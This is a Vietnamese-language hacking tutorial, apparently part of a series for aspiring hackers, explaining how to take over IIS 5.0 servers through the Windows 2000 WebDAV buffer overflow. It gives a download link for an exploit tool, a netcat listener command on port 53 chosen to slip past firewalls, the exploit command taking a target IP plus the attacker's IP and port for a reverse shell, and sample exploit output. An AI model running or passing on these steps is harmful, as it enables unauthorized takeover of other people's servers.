Những hiểu biết cơ bản nhất để trở thành Hacker phần 4 pot

Những hiểu biết cơ bản nhất để trở thành Hacker phần 4

trang này đã được đọc lần

50 . ) Kỹ thuật hack server thông qua lỗi tràn bộ đệm WebDAV :

Giới thiệu : Giao thức World Wide Web Distributed Authoring and

Versioning (WebDAV) là một tập hợp các mở rộng cho giao thức

HTTP dùng để cung cấp một cách thức chuẩn cho việc biên tập và

quản lý file giữa các máy tính trên Internet. Lỗi tràn bộ đệm đã được

phát hiện trong một thành phần của Windows 2000 được sử dụng

bởi WebDAV có thể cho phép kẻ tấn công chiếm quyền điều khiển

máy tính .

Chuẩn bị : Ngoài những đồ nghề đã giới thiệu ở các bài trước , các

bạn hãy vào down thêm www32.brinkster.com/anhdenday/wb.zip

extract để ở trong C:\

Khai thác :

+ Tìm một trang Web dùng IIS 5.0

+ Vào Dos , vào đặt NETCAT ở chế độ lắng nghe :

C:\>nx -vv -l -p 53

listening on [any] 53 ...

Ta để nó lắng nghe ở cổng 53 vì tường lửa ko chặn cổng này .

+ Mở thêm một của sổ DOS nữa .

+ Ta sử dụng WebDAV vừa down về .

c:\wb.exe <IP của máy chủ IIS> <IP của máy tính của mình dùng để

tấn công> <cổng lắng nghe> [padding=1,2,3...]

VD :

C:\> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1

[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]

www.coromputer.net && undernet #coromputer

Checking WebDav on 'xxx.xxx.xxx.xxx' ... FOUND

exploiting ntdll.dll through WebDav [ret: 0x00100010]